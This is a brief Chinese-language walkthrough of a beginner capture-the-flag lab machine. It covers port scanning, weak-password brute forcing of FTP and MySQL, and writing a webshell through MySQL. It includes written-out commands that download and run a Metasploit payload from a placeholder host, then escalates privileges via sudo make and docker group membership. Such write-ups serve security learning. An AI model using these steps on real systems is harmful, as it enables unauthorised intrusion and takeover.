说明:这是另一个,请享用。
难度:初学者
联系人:@ whitecr0wz
在VirtualBox中这可能比VMware更好
扫端口。
爆破FTP弱口令和mysql弱口令。
查看8080端口
这里所列的文件是当前目录下的。
当前的工作目录为/var/tmp
登录Mysql
这里的secure_file_priv为空,说明可以写任意目录。
这里菜刀连接不上.
用其他的webshell
上传msf木马。
Wget http://xxx/isshell
Chmod 777 isshell
./isshell
msf成功连接。
这里提示的意思是www-data能以dusk用户的权限运行以下命令
Sudo make提权 .
这里有一个docker组,利用docker提权。
https://github.com/chrisfosterelli/dockerrootplease
成功拿到root权限,获取flag.
查看docker提权的详解。
https://segmentfault.com/a/1190000002789942
这里就解释的很清楚了,当获取docker组用户几乎获得了root权限。